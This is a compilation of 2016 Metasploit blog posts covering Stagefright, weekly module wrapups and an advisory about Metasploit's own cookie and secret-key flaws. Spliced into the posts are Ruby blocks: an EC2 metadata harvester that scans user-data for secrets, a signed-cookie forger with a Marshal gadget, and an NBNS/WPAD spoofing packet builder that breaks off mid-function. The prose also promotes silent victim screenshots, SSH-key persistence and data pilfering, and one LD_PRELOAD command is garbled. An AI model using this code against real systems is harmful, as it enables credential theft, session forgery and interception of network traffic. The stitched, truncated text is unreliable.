
Pokemon Go started it.


The crusty old house cell phone, which we had years ago ported from a genuine AT&T land line to a T-Mobile account, suddenly caught the attention of my middle son.

  "Hey Dad, can I use that phone to catch Pokemon at the park?"


"Sure! Have fun, and don't come back until sundown!"

A few minutes later, he had hunted down his first Pikachu, which apparently required running around the block in Texas summer heat a few times. Sweat-soaked but proud, he happily presented his prize. I could get used to this! The kids were getting out of the house, exploring the neighborhood, having fun, and I was getting a little peace and quiet. Then one day, Pokemon Go stopped working, stating that it did not support 'rooted' phones.


First some back story. Our 'house phone' role is generally filled by the most-working last-gen reject device that is too old to be useful as a daily driver, but too new to throw away. In this case, it was a Google Nexus 4. I have always preferred the Google phones over those from other manufacturers for a number of reasons:


  • They're cheap if you get the last generation (and sometimes the current).
  • They usually lead the pack when it comes to software updates and hackability.


However, given the industry's appetite for quick turnarounds and obsolescence cycles, (and in spite of Google's generally good support) this phone is end-of-life, and has not received an official firmware update in over a year. In fact, this phone is the amalgamation of two Nexus 4's, combined into a frankenstein assemblage of the most-working screen, battery, and charging ports of the original pair.


Since it has been a year and a half since Google released a firmware for this phone, I had it running the next-best thing: Cyanogenmod 13, which backported Android 6 to this hardware. Now this junker phone is as up-to-date as the Android Open Source Project (AOSP) allows. But there was now a show-stopper: you can't run Pokemon Go on rooted phones running Cyanogenmod. Technically there is a new set of hacks, but this is a cat-and-mouse game, and there comes a time in your life when you just want things to work. And the kids were already hooked.


Why did Niantic decide to impose this restriction after several months of unrestricted access? It comes down to cheaters. People were rooting their phones specifically to fake GPS coordinates to get rare Pokemon, grow eggs, etc. Since having root access is also required to install non-stock firmware, in this guilty-until-proven-innocent model, we basically get to choose between two possibilities: get up-to-date software but sacrifice the ability to run some applications, or run increasingly out-of-date 'official' software, for the sake of satisfying a DRM or anti-cheating scheme.


In the end, I decided that the stock firmware still allowed upgrading a lot of the key components via Google's Play Store, the real core on which an increasing amount of the software in the Android ecosystem relies. Sure, I'm not getting the latest advances in encrypted filesystems, kernel hardening, or process isolation from the newest versions of Android, but it's a tradeoff. Maybe the phone will have died completely by the time the next exploitable bug in libstagefright rears its head.


But, maybe it already has.


It took over a year for enough of the moving parts for a reliable exploit for CVE-2015-3864, one of the 'StageFright' series of vulnerabilities, to come together within Metasploit. The exploit needed new payloads, new techniques, and a number of independent research projects to become useful outside of the proof-of-concept realm. In the end, it works very well, even better than the Metaphor exploit from earlier this year, and can be easily targeted to any vulnerable Nexus phone.


Ironically, the very openness of the Google Nexus ecosystem made porting the exploit to those firmware builds particularly easy. In contrast, Samsung firmware, which contains many proprietary additions to the base Android system, and is not open-source, is harder to target simply because it is harder to examine. In spite of this, it was still possible to target Samsung phones as well. Effectively, with enough effort, any firmware is exploitable. It is just a question of time.


When you think of exploits in the StageFright family, think of the vector: someone sends a special text message and takes over a phone without anyone even reading it. You get an email, and without opening it, code is already executing on your device. It's a simple concept, but the fix is not nearly as straightforward.


Automatic parsing of metadata in media files is a commonly-researched and frequently targeted attack surface in many different products. Adobe Flash had nasty vulnerabilities in its MP3 metadata parsing code earlier this year. Apple iOS has been vulnerable a number of times to similar attacks. Just last month, similar vulnerabilities were found in Android's libutils library, which could be attacked in the same way.


The exploit that we included in Metasploit for CVE-2015-3864 only targets one vector (web browser) and one file type (MP4 video files). However, there are many other vectors and file types that could also be exploited in the same family, that were discovered around the same time period as CVE-2015-3864. Not only that, but more vectors and file types have been found since the original round of StageFright branded vulnerabilities were hot in the news, and quietly patched.


Of course, none of these patches have made it into the official firmware for my Nexus 4. I even had to do a double-take in researching this article, since Wikipedia claimed Android 5.1.1 was last updated 2 months ago, while I knew the phone hadn't gotten an over-the-air update in some time. To really know if you're up-to-date, you have to look at the build number: the Nexus 4 is on LMY48T while the latest is LMY49M. It's unlikely that the average consumer with a phone running Android '5.1.1' would be able to tell the difference between a vulnerable and an up-to-date build number, much less the average business with a bring-your-own-device policy.


The choice between running the software you want, like Pokemon Go, and the quick road to obsolete devices in the Android ecosystem, at best forces users to make a choice between security and functionality. The theoretical exploit chains being patched this year can easily turn into next year's reliable Metasploit module.


Maybe it's time to bring back the land line.


Weekly Metasploit Wrapup

Posted by egypt Employee Oct 7, 2016

Silence is golden


Taking screenshots of compromised systems can give you a lot of information that might otherwise not be readily available. Screenshots can also add a bit of extra spice to what might be an otherwise dry report. For better or worse, showing people that you have a shell on their system often doesn't have much impact. Showing people screenshots of their desktop can evoke a visceral reaction that can't be ignored. Plus, it's always hilarious seeing Microsoft Outlook open to the phishing email that got you a shell. On OS X, this can be accomplished with the module post/osx/capture/screenshot. Prior to this week's update, doing so would trigger that annoying "snapshot" sound, alerting your victim to their unfortunate circumstances. After a small change to that module, the sound is now disabled so you can continue hacking on your merry way, saving the big reveal for some future time when letting them know of your presence is acceptable.


Check your sums before you wreck your sums


Sometimes you just want to know if a particular file is the same as what you expect or what you've seen before. That's exactly what checksums are good at. Now you can run several kinds of checksums from a meterpreter prompt with the new checksum command. Its first argument is the hash type, e.g. "sha1" or "md5", and the rest are remote file names.


Metadata is best data, everyone know this


As more and more infrastructure moves to the cloud, tools for dealing with the various cloud providers become more useful.


If you have a session on an AWS EC2 instance, the new post/multi/gather/aws_ec2_instance_metadata can grab EC2 metadata, which "can include things like SSH public keys, IPs, networks, user names, MACs, custom user data and numerous other things that could be useful in EC2 post-exploitation scenarios." Of particular interest in that list is custom user data. People put all kinds of ridiculous things in places like that and I would guess that there is basically 100% probability that the EC2 custom field has been used to store usernames and passwords.
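
To make the post-exploitation use concrete, here is an added example (it is not the aws_ec2_instance_metadata module itself) that walks the IMDSv1 tree at 169.254.169.254 and scans user-data for the kind of thing people should not put there. The fake metadata tree, the secret-matching patterns and the helper names are constructed for this example; on a real instance you would hand gather_ec2 the live fetcher instead of the fake one.

```ruby
# Added example (not the post/multi/gather/aws_ec2_instance_metadata module
# itself): walk the EC2 instance metadata tree the way a post-exploitation
# script would, then scan user-data for credential-looking strings.
#
# IMDSv1 at 169.254.169.254 answers a directory path with one entry per line;
# entries ending in "/" are sub-directories, anything else is a leaf. The
# fetcher is injected so the walk can run offline against the constructed
# fake tree at the bottom.
require 'net/http'
require 'uri'

IMDS_BASE = 'http://169.254.169.254/latest/'.freeze

# Live fetcher: GET a path relative to IMDS_BASE; nil on any failure.
def imds_fetch(path)
  uri = URI.join(IMDS_BASE, path)
  Net::HTTP.start(uri.host, uri.port, open_timeout: 2, read_timeout: 2) do |http|
    res = http.get(uri.request_uri)
    res.is_a?(Net::HTTPSuccess) ? res.body : nil
  end
rescue StandardError
  nil
end

# Recursively map every leaf path under +root+ to its value.
def walk_metadata(root = 'meta-data/', fetch: method(:imds_fetch), depth: 0)
  return {} if depth > 8                      # IMDS is shallow; bound the recursion
  listing = fetch.call(root)
  return {} if listing.nil?
  listing.each_line(chomp: true).each_with_object({}) do |entry, found|
    next if entry.empty?
    child = root + entry
    if entry.end_with?('/')
      found.merge!(walk_metadata(child, fetch: fetch, depth: depth + 1))
    else
      value = fetch.call(child)
      found[child] = value unless value.nil?
    end
  end
end

# Heuristic patterns for secrets that end up in user-data (assumption: a
# starting point, not an exhaustive list).
SECRET_PATTERNS = [
  /\b(?:AKIA|ASIA)[0-9A-Z]{16}\b/,                          # AWS access key id
  /(?:password|passwd|pwd|secret|token)\s*[=:]\s*\S+/i,     # key=value credentials
  /-----BEGIN (?:RSA |EC |OPENSSH )?PRIVATE KEY-----/,      # embedded private keys
].freeze

def find_secrets(text)
  return [] if text.nil?
  SECRET_PATTERNS.flat_map { |re| text.scan(re) }.uniq
end

# Constructed fake IMDS tree for offline use (not real instance data; the
# real public-keys listing nests as "0=<name>/openssh-key", simplified here).
FAKE_IMDS = {
  'meta-data/'                          => "hostname\nlocal-ipv4\npublic-keys/\niam/\n",
  'meta-data/hostname'                  => 'ip-10-0-1-5.ec2.internal',
  'meta-data/local-ipv4'                => '10.0.1.5',
  'meta-data/public-keys/'              => "0/\n",
  'meta-data/public-keys/0/'            => "openssh-key\n",
  'meta-data/public-keys/0/openssh-key' => 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAB deploy@build',
  # 'meta-data/iam/' is absent: no instance profile, IMDS answers 404 -> nil
  'user-data'                           => "#!/bin/bash\nexport DB_PASSWORD=hunter2\n" \
                                           "aws configure set aws_access_key_id AKIAIOSFODNN7EXAMPLE\n",
}.freeze
FAKE_FETCH = ->(path) { FAKE_IMDS[path] }

# Gather everything of interest in one call; swap FAKE_FETCH for
# method(:imds_fetch) on a real instance.
def gather_ec2(fetch: FAKE_FETCH)
  metadata  = walk_metadata('meta-data/', fetch: fetch)
  user_data = fetch.call('user-data')
  { metadata: metadata, user_data: user_data, secrets: find_secrets(user_data) }
end

if __FILE__ == $PROGRAM_NAME
  result = gather_ec2
  result[:metadata].each { |k, v| puts "#{k} = #{v}" }
  puts "suspicious strings in user-data: #{result[:secrets].inspect}"
end
```

The walk deliberately treats a missing sub-tree (no IAM instance profile, so the iam/ path 404s) as empty rather than an error, since that is the normal case on many instances, and it bounds the recursion depth so a hostile or looping fake endpoint cannot hang a session.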


Magical ELFs


For a while now, msfvenom has been able to produce ELF shared library (.so) files with the elf-so format option. Formerly, these only worked through the normal linking path, i.e., when an executable loaded the library from /usr/lib or wherever; due to a couple of otherwise unimportant header fields, they didn't work with LD_PRELOAD. For those unfamiliar with LD_PRELOAD, it's a little bit of magic that makes the dynamic loader load a library implicitly, rather than because the binary declared that it needs that library. The mechanism is often used for debugging, so you can stub out functions or make them behave differently when you're trying to track down a tricky bug.


It's also super useful for hijacking functions. That use case opens up lots of fun shenanigans, like building a userspace rootkit, but for our purposes it's often enough simply to run a payload, so a command like this:

LD_PRELOAD=./ /bin/true

will result in a complete mettle session running inside a /bin/true process.


New Modules


Exploit modules (1 new)

Auxiliary and post modules (3 new)


Get it


As always, you can update to the latest Metasploit Framework with a simple msfupdate and the full diff since the last blog post is available on GitHub: 4.12.28...4.12.30


To install fresh, check out the open-source-only Nightly Installers, or the binary installers which also include the commercial editions.


Weekly Metasploit Wrapup

Posted by egypt Employee Sep 30, 2016

Extra Usability


Commandline tools in general are powerful, but come with a learning curve. When you've been using a tool for a long time, that curve becomes a status quo that embeds itself in your fingers. That isn't always a good thing because it tends to make you blind to how things can be better and it takes an effort of introspection to notice inefficiencies. Even then, you weigh those inefficiencies against the effort required to improve.


An example of that is msfconsole's route command, which gets a bit of a spruce up this week. Instead of showing help output when given no arguments, it now shows the current routing table. In addition, it now supports using a session id of "-1" to indicate the most recent session, just like you can do for the SESSION option in post modules.


Extra privilege escalation


In the last few years, privilege escalation has become more important in the Windows world but it has always been a staple on Unix operating systems. This update brings two privilege escalation modules, one for the Linux kernel and one for NetBSD's /usr/libexec/mail.local, for your rooting pleasure.


Extra Meta Metasploitation


As I mentioned in the last wrapup, we've landed @justinsteven's modules for attacking Metasploit from Metasploit. The first, metasploit_static_secret_key_base, exploits the way Rails cookies are serialized and the fact that an update would step on the randomly generated secret key with a static one. Check out the full details if you're interested in how that works.


The second, metasploit_webui_console_command_execution, isn't a vulnerability as such. Rather, it takes advantage of the fact that admin users can run msfconsole in the browser, and therefore run commands on the server. This is the sort of thing that can't be patched without just removing the functionality altogether; it's literally a feature, not a bug. Authenticated administrators can do administrator things, as you might expect.


Extra Android Exploit


At Derbycon last week, long-time friend of the Metasploit family, @jduck, released his latest version of Stagefright, an exploit for Android's libstagefright. He demo'd exploiting a Nexus device, but lots of other stuff is vulnerable too. Due to the rampant fragmentation in the Android world, this year-old bug is probably going to be showing up on new phones sitting on store shelves for quite a while yet.


Extra Bacon


And last but not least, this week brings a module for exploiting EXTRABACON, the Cisco ASA vulnerability made public by the Shadow Brokers leak a few weeks ago. The bug is a buffer overflow in SNMP object ID strings. The module does exactly what the Equation Group exploit does: it disables authentication on the victim device and lets you log in over SSH or Telnet with no password. This module was a collaboration between lots of folks and improves on the coverage in the original exploit, even adding targets for some 9.x devices that the advisory says are not affected.


This democratization of exploits through open source continues to show that being open and transparent leads to better exploits, more public knowledge, and better patches.


New Modules


Exploit modules (7 new)


Auxiliary and post modules (1 new)

Get it


As always, you can update to the latest Metasploit Framework with a simple msfupdate and the full diff since the last blog post is available on GitHub: 4.12.25...4.12.28


To install fresh, check out the open-source-only Nightly Installers, or the binary installers which also include the commercial editions.

A number of important security issues were resolved in Metasploit (Pro, Express, and Community editions) this week. Please update as soon as possible.



Issue 1: Localhost restriction bypass

    (affects versions 4.12.0-2016061501 through 4.12.0-2016083001)


On initial install, the Metasploit web interface displays a page for setting up an initial administrative user. After this initial user is configured, you can log in and use the Metasploit web UI for the first time. Since this initial screen is unauthenticated, it is supposed to be reachable only by a local user (e.g. hitting the localhost hostname or loopback IP address).


Until the current release, this restriction did not work properly in Metasploit 4.12.0 releases. Instead, on initial install, the page for setting up the initial administrative user was reachable from any address, not only loopback. An attacker might be able to 'race' a fresh Metasploit installation and become the first to create an administrative user.



For users who are planning on using Metasploit with the web interface, it is important to isolate the machine from hostile networks until initial configuration is complete, or be sure to use the latest Metasploit installer in which this issue is resolved.
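
For reference, this is the shape of a "loopback only" guard that behaves the way Issue 1 describes the intended behaviour. It is an added example and not Metasploit's own code; it assumes a Rack-style env hash in which REMOTE_ADDR is the TCP peer address, and the function names are illustrative.

```ruby
# Added example, not Metasploit's own code: a correct "loopback only" guard
# for an unauthenticated first-run setup page.
# Assumption: a Rack-style env hash where REMOTE_ADDR is the TCP peer.
require 'ipaddr'

LOOPBACK_NETS = [IPAddr.new('127.0.0.0/8'), IPAddr.new('::1/128')].freeze

# True only for a genuine loopback peer. IPv4-mapped IPv6 (::ffff:127.0.0.1),
# which a dual-stack listener reports, is normalised first; garbage is denied.
def loopback_peer?(remote_addr)
  ip = IPAddr.new(remote_addr.to_s)
  ip = ip.native if ip.ipv6? && ip.ipv4_mapped?
  LOOPBACK_NETS.any? { |net| net.include?(ip) }
rescue ArgumentError                  # IPAddr::InvalidAddressError and friends
  false
end

# The decision rests on the socket peer only: Host and X-Forwarded-For are
# attacker-controlled and must not be consulted. Once the first admin exists
# the page is gone regardless of where the request came from.
def allow_initial_setup?(env, admin_exists:)
  return false if admin_exists
  loopback_peer?(env['REMOTE_ADDR'])
end
```

Two details matter in practice: the check has to run on the peer address the socket reports, not on any header, and it has to stop mattering the moment the first administrator exists, so that a later misconfiguration of the listener cannot resurrect the page.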


Thanks to Brandon Perry for discovering and reporting this issue.


Issue 2: Predictable session cookies

    (affects versions 4.12.0-2016061501 through 4.12.0-2016083001)


Metasploit uses a randomized secret key to protect session cookies from forgeries. On installation, it randomizes the secret key and stores it in a local configuration file.


As of Metasploit 4.12.0, the update packages inadvertently include a static version of this secret key file, which overwrites the randomly-generated one. The effect is that every affected Metasploit installation ends up with the same hard-coded secret, so session cookies can be forged by anyone who has it. Combined with the Marshal cookie serializer described in Issue 3, a forged cookie lets an unauthenticated user achieve remote code execution through object deserialization.



On startup, Metasploit will identify 'bad' static secret keys that may be installed, and if found, the base secret key is regenerated. If this fix is needed, and if a user is applying the latest update via the web UI, the UI may appear to hang during the update, though it will complete successfully in the background. In this case, simply refresh the web UI after 10-20 minutes. If it loads a login screen, the update applied successfully.


Users who updated from 4.11.0 or earlier builds are not affected, but are still encouraged to update.


Thanks to Justin Steven for discovering and reporting this issue.


Issue 3: `config.action_dispatch.cookies_serializer` is set to `:hybrid`

    (affects versions 4.12.0-2016061501 through 4.12.0-2016083001)


Metasploit versions 4.11.x and earlier use the default 'marshal' cookie type, which is vulnerable to remote object instantiation / remote code injection by anyone able to generate a signed session cookie.



The Metasploit 4.12.0 point release switched to the 'hybrid' type, which reads both formats and gives users a migration path to the safer 'json' type. The latest release switches entirely to the 'json' cookie serialization method.


Thanks to Justin Steven for discovering and reporting this issue.


Weekly Metasploit Wrapup

Posted by egypt Employee Sep 16, 2016

Security is hard


I usually focus exclusively on the Metasploit Framework here on these wrapups, but this week is a little special. This week the Metasploit commercial products (Pro, Express, and Community) come with a fix for a couple of vulnerabilities. You heard that right, remotely exploitable vulns in Metasploit. Our lovely engineering manager, Brent Cook, helpfully wrote up the details yesterday.


TL;DR - Three bugs, two of which work together: 1) the filter restricting the creation of the first admin account to localhost was broken. As has always been the case, having an admin account on Metasploit lets you run commands on the server. 2) The randomly generated session key got stepped on by a static one whenever updates were applied, so the same key was used for every Metasploit installation. And because of 3), session cookies are serialized Ruby objects, so a forged cookie is code exec, too.


Security is hard and even experts like us screw it up sometimes. But in true Metasploit fashion, we're not content to just patch the vuln. There is currently a Pull Request in review that will get you shells on Metasploit if you know credentials. Since it's Authenticated Code Execution by Design, it will work even without this vulnerability as long as you can steal a username and password. Expect that to land soon and be in the next wrapup. And while you're waiting, go double check to make sure you did the initial account setup on your Metasploit installs.
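
To show why bugs 2 and 3 from this TL;DR (Issues 2 and 3 in the advisory above) combine into unauthenticated code execution, here is an added example; it is not code from Metasploit or Rails. It is a minimal stand-alone reimplementation of the Rails 4 signed-cookie format (signing key derived from secret_key_base with PBKDF2-HMAC-SHA1, base64 payload, HMAC-SHA1 digest) with a pluggable serializer. The static secret value and the Canary class are assumptions: Canary only records that Marshal invoked a hook on an attacker-chosen class, which is the point at which a real gadget chain would run code.

```ruby
# Added example, not code from Metasploit or Rails: a minimal stand-alone
# reimplementation of how Rails 4 signs session cookies, used to show why a
# shipped static secret_key_base plus a Marshal serializer is unauthenticated
# code execution, while the JSON serializer only ever yields plain data.
require 'openssl'
require 'base64'
require 'json'
require 'securerandom'

# Stand-in for the static secret that the faulty update package wrote over
# the per-install random one (assumed value; the real one is not reproduced).
STATIC_SECRET_KEY_BASE = 'static-secret-shipped-in-every-update'.freeze

# Rails derives the cookie signing key from secret_key_base with
# PBKDF2-HMAC-SHA1 (1000 iterations, 64-byte key, salt "signed cookie").
def cookie_signing_key(secret_key_base)
  OpenSSL::PKCS5.pbkdf2_hmac_sha1(secret_key_base, 'signed cookie', 1000, 64)
end

# Signed cookie wire format: base64(payload) + "--" + hex(HMAC-SHA1).
def sign_cookie(payload, key)
  data = Base64.strict_encode64(payload)
  "#{data}--#{OpenSSL::HMAC.hexdigest('SHA1', key, data)}"
end

# Constant-time comparison so the verifier does not leak the digest.
def secure_equal?(a, b)
  return false unless a.bytesize == b.bytesize
  a.bytes.zip(b.bytes).inject(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
end

# Returns the raw serialized payload if the signature is valid, else nil.
def verify_cookie(cookie, key)
  data, digest = cookie.to_s.split('--', 2)
  return nil unless data && digest
  return nil unless secure_equal?(digest, OpenSSL::HMAC.hexdigest('SHA1', key, data))
  Base64.strict_decode64(data)
rescue ArgumentError
  nil
end

# Records that deserialization ran code on an attacker-chosen class. A real
# gadget would do something useful here; marshal_load is simply one of the
# hooks Marshal.load invokes on whatever class the payload names.
DESERIALIZATION_LOG = []
class Canary
  def marshal_dump; 'anything'; end
  def marshal_load(_data); DESERIALIZATION_LOG << :marshal_load_ran; end
end

SERIALIZERS = {
  marshal: { dump: ->(o) { Marshal.dump(o) },  load: ->(s) { Marshal.load(s) } },
  json:    { dump: ->(o) { JSON.generate(o) }, load: ->(s) { JSON.parse(s) rescue nil } },
}.freeze

# Server side: verify the signature, then hand the payload to the serializer.
def read_session(cookie, key, serializer)
  raw = verify_cookie(cookie, key)
  raw && SERIALIZERS[serializer][:load].call(raw)
end

# Attacker side: with the secret known, mint a cookie carrying a Marshal gadget.
def forge_marshal_cookie(secret_key_base, obj = Canary.new)
  sign_cookie(Marshal.dump(obj), cookie_signing_key(secret_key_base))
end
```

Run through the three cases and the fix explains itself: with the shared secret and the marshal serializer, the forged cookie verifies and Marshal.load runs the Canary hook before any login check; the same cookie under the json serializer verifies but parses to nothing, because JSON can only produce hashes, arrays and scalars; and once the secret is regenerated the forgery fails at the signature. That is why the advisory both regenerates the key and moves to json.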


Download improvements


It's a bit of a hassle if a download gets interrupted, especially if the file is large. Thanks to first-time contributor cayee, you can now continue an interrupted download with Meterpreter's new download -c.


Module documentation


We've been pumping out better documentation for individual modules for a few months now, since the introduction of info -d, which gives you nice pretty markdown.


If you have wanted to contribute but didn't know what you wanted to work on, this is a great place to get started. Check out the Module Documentation milestone for a list of the modules we think are the highest priority. Github won't let you assign a ticket to someone who isn't part of the Metasploit organization, so leave a comment on one of those issues to claim it so others don't duplicate your work.


New Modules

Exploit modules (1 new)

Auxiliary and post modules (4 new)

Get it


As always, you can update to the latest Metasploit Framework with a simple msfupdate and the full diff since the last blog post is available on GitHub: 4.12.22...4.12.25


To install fresh, check out the open-source-only Nightly Installers, or the binary installers which also include the commercial editions.


Weekly Metasploit Wrapup

Posted by egypt Employee Sep 2, 2016

PHP Shells Rising from the Flames


Phoenix Exploit Kit is your standard run-of-the-mill crimeware system, written in PHP, whose creator apparently got popped by the FSB earlier this year. Like many exploit kits, it has a back door, this one allowing you to eval whatever PHP code you like by sending it in a GET parameter (subtly named 'bdr'). Of course running arbitrary PHP allows us control of the underlying operating system to various degrees depending on configuration.


I love the idea of popping shells in malware. We've been doing it for a while, since way back in the day with exploit/windows/ftp/sasser_ftpd_port, an exploit for the FTP server run on compromised machines by the sasser worm, and I was delighted to discover that I'm not the only one who finds exploits for malware to be hilarious.


MalSploitBase is a database of exploits for known vulns in evil things just like these. Even better, its code is available on GitHub, and the author encourages pull requests.


How come you never call anymore?


If you create child processes from your Meterpreter session, you often want to keep track of them and make sure they're not staying out too late or getting caught up with the wrong crowd. A new option to Meterpreter's ps command makes that a little easier, giving you a nice printout of all the children of your current process.


Other Post stuff


A few fun new modules from an up-and-coming contributor h00die make persistence on Linux a bit easier in the latest release. One of the big advantages of having modules for doing persistence instead of dropping files manually is the ability to automate it. For example, putting post/linux/manage/sshkey_persistence in your AutoRunscript option for an exploit lets you automatically establish a way back in without having to think about it in the crucial first few minutes of having a shell.


And finally, for an exciting exfiltration extravaganza, post/multi/manage/zip gives you a platform-agnostic way of zipping up a directory for simplified pilfering.


New Modules


Exploit modules (5 new)

Auxiliary and post modules (3 new)


Get it


As always, you can update to the latest Metasploit Framework with a simple msfupdate and the full diff since the last blog post is available on GitHub: 4.12.19...4.12.22


To install fresh, check out the open-source-only Nightly Installers, or the binary installers which also include the commercial editions.


Metasploit Weekly Wrapup

Posted by William Webb Aug 12, 2016

Las Vegas 2016 is in The Books


This week's wrap-up actually covers two weeks thanks in large part to the yearly pilgrimage to Las Vegas.  I myself elected not to attend, but I'm told everyone had a great time.  Many on the team are still recuperating, but I'd wager that they all enjoyed seeing you there as well.  Here's to everyone's speedy recovery.




Centreon Web UserAlias Command Execution


Our first new module this go-around exploits a remote command execution vulnerability in Centreon Web via a pre-auth SQL injection.  The bug, originally discovered by Nicolas Chatelain, is detailed in a nice writeup.  The short version is that they don't escape "\", they call 'echo' via exec(), and very bad things happen.  Luckily the bug was promptly fixed in late 2014 and doesn't affect current versions, but if for some reason you haven't updated by now, you should probably look into it.


Polycom Command Shell Authorization Bypass


Next, we have a module that managed to slip through the cracks for about 4 years now.  Sorry.  It targets an authorization bypass vulnerability in older firmware releases for the Polycom HDX line of video conferencing endpoints.  The original vulnerability discovery was made by Paul Haas in 2012 and publicly disclosed in January of 2013 in his original advisory.  Paul released a module at the time, but for some reason it wasn't incorporated into Metasploit Framework.  That's all changed thanks to h00die, who has ported the module to work with newer versions of the framework.  While bugs this old are often not that exciting, it's reasonable to assume that firmware for video equipment is one of the last things on the mind of many IT administrators when considering a maintenance strategy for their organization, which makes this one a bit more interesting.


Drupal RESTWS Module Remote PHP Code Execution


In other web application news, we recently landed a module by Mehmet Ince targeting a remote code execution vulnerability in the Drupal 7.x RESTWS Module.  RESTWS versions below 2.6 in the 2.x series and 1.7 in the 1.x series are affected by the issue.  Despite resulting in arbitrary code execution on any host running the affected module, the bug is fairly simple, and exploitation couldn't be easier thanks to Mehmet's module.




Internet Explorer 11 VBScript Memory Corruption


Last week, some jerk wrote a module for CVE-2016-0189, which exploits a memory corruption vulnerability in Internet Explorer 11's VBScript engine.  The module was based on the original PoC published by Theori, who provided an excellent writeup of their efforts reversing this interesting bug from the patches.  In a nutshell, the exploit leverages some logic errors into a write primitive and uses that to enable execution of arbitrary VBScript.  While Internet Explorer 11 on Windows 10 isn't that popular, and VBScript is akin to a Lovecraftian horror that would drive one to insanity should they even contemplate it, vulnerabilities like these are quite interesting to work with, especially as mitigations against common browser exploit vectors such as use-after-frees continue to improve.



Utility Module Goodness


Our last two modules this week aren't exactly exploits, but they do provide some awesome auxiliary capabilities.  For one, we landed an incredibly useful SMB Delivery module by Andrew Smith and Russel Van Tuyl.  Hosting payloads via an SMB share is sometimes the best option available for delivery depending on the situation.  In the past, authors have had to roll their own SMB functionality into their Metasploit modules.  This module greatly simplifies that process. Finally, Robert Kugler submitted a module that lets one recover the installation password for recent versions of Avira Antivirus.


Weekly Metasploit Wrapup

Posted by egypt Employee Jul 22, 2016

Windows Privilege Escalation


In the long long ago, Windows users pretty much universally had local Administrator accounts. While that's still true in less mature environments, I think we have done a pretty good job as an industry of convincing folks to reduce users' privileges. Back in those days, privilege escalation exploits weren't all that useful because every exploit, executable, and Word macro already gave you the highest privileges. Today that's less true.


Even worse for the enterprising hacker, modern browser exploitation frequently gives you the lowest possible privileges, even without the ability to read or write files outside of certain directories or interact with processes other than your own, due to sandboxing. One major advantage of kernel vulnerabilities is the fact that they skip right out of those sandboxes straight to NT AUTHORITY\SYSTEM.


Two Windows vulnerabilities, one patched in February and the second in March, get exploits this week for your privilege escalating pleasure.


Test Our Mettle


Over the years there have been several iterations of Meterpreter for a POSIX environment, with limited success. As of this week, we're shipping a new contender for the throne of unix payloads: Mettle. It's a ground-up implementation of the Meterpreter protocol and featureset for multiple architectures and POSIX platforms. One of the barriers to such a payload has been the fact that it requires packaging up a static libc and any libraries it will need on target. This is in contrast to Windows, where the extreme adherence to backwards compatibility through the ages means that things like socket functions in ws2_32.dll can be relied upon pretty universally, which just isn't remotely true of all the various unices. The most recent attempt was built on Android's Bionic libc, but several issues made it clear we needed something else. Mettle uses musl, a small, highly portable, optimized libc. While we're currently only testing Linux, musl's portability will give us the ability to expand to other things like Solaris and BSD in the future.


The old implementation will continue to live side-by-side with the new one for a while, but once Mettle has the main required features, the Bionic-based POSIX Meterpreter will be allowed to retire to a beach somewhere to drink margaritas and complain about kids these days.


New Modules


Exploit modules (5 new)

Auxiliary and post modules (3 new)

Get it


As always, you can update to the latest Metasploit Framework with a simple msfupdate and the full diff since the last blog post is available on GitHub: 4.12.11...4.12.14


To install fresh, check out the open-source-only Nightly Installers, or the binary installers which also include the commercial editions.


Weekly Metasploit Wrapup

Posted by egypt Employee Jul 8, 2016

House keeping


Since the last Wrapup, we've been continuing our long-running project of breaking up some of the old cobweb-encrusted parts of the framework codebase into smaller pieces that are easier to deal with. A few things, lib/sshkey and lib/bit-struct in particular, that for historical reasons were just slightly modified copies of a gem, have been pulled out entirely in favor of the upstream release. A bunch of other things have been pulled out into their own repositories, making the whole codebase a little tidier.


NBNS and BadTunnel


NBNS is the NetBIOS Name Service, which Windows uses to do fast local translations of hostnames to IP addresses. Like DNS, being able to lie about answers gives an attacker the ability to act as a man-in-the-middle. Unlike DNS, requests are broadcast to the local subnet. That means listening for those requests and spoofing replies gets you a MitM position on whatever they were requesting, a longstanding hacker favorite. It is also a downside, because it means you have to be on the same local network as the victim to see those requests and know how to reply. However, the replies are plain UDP datagrams, which routers don't mind forwarding on to different subnets, so you can send unsolicited answers without ever seeing the question. You just need to guess the transaction ID, a 16-bit number. As it turns out, 16-bit numbers aren't that big and you can just spam packets until one matches. You still need to know the hostname being looked up, though. Enter WPAD.


Hackers have loved Web Proxy Auto-Discovery, or WPAD, forever. For those unfamiliar with it, it's an HTTP service that hosts a small piece of JavaScript (a PAC file) for determining whether a given URL should go through a proxy. Windows uses this by default not just for requests from Internet Explorer, but for everything that uses the WinInet API.

One way to convince a client that you are their WPAD server is to respond to the NBNS lookup for a host with that name. Metasploit and other tools have been providing that handy service for years to great effect. But now you don't need to be on the same subnet. You can just spam replies for WPAD for a few seconds until you get lucky, and suddenly you are in the middle of all HTTP requests by claiming to be their proxy. And it gets better. If you can somehow convince someone to send any NetBIOS traffic your way, you can do the same across NAT, thanks to BadTunnel.
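
To make the two paragraphs above concrete, here is an added example (not Metasploit's nbns_response code) that builds and parses NBNS packets: the on-subnet case answers the broadcast it saw with that query's own transaction ID, and the off-subnet case sprays a response for every one of the 65536 possible IDs. Nothing here touches the network; the send callable is where you would wire in a UDP socket. The response flags (0x8500) and the 165-second TTL are assumptions taken from what spoofing tools commonly emit, and the function names are illustrative.

```ruby
# Added example, not Metasploit's nbns_response code: build and parse NBNS
# packets so the spoofing described above is concrete, including the blind
# off-subnet case where every 16-bit transaction id is tried. Nothing here
# touches the network; +send+ is a callable you wire to a UDP socket
# (assumption: 0x8500 response flags and a 165s TTL, the values commonly used
# by spoofing tools).

# First-level encoding: each byte of the 16-byte NetBIOS name (15 chars padded
# with spaces plus a suffix byte) becomes two nibbles offset from 'A'.
def encode_netbios_name(name, suffix = 0x00)
  raw = (name.upcase.ljust(15)[0, 15] + [suffix].pack('C')).b
  raw.each_byte.map { |b| [(b >> 4) + 0x41, (b & 0x0f) + 0x41].pack('CC') }.join
end

def decode_netbios_name(encoded)
  bytes = encoded.bytes.each_slice(2).map { |hi, lo| ((hi - 0x41) << 4) | (lo - 0x41) }
  raw = bytes.pack('C*')
  [raw[0, 15].rstrip, raw.getbyte(15)]
end

# Wire form: length byte 0x20, 32 encoded bytes, terminating 0x00.
def nbns_wire_name(name, suffix)
  "\x20".b + encode_netbios_name(name, suffix) + "\x00".b
end

# NB (0x0020) IN (0x0001) query as a Windows client broadcasts it.
def build_nbns_query(txid, name, suffix = 0x00)
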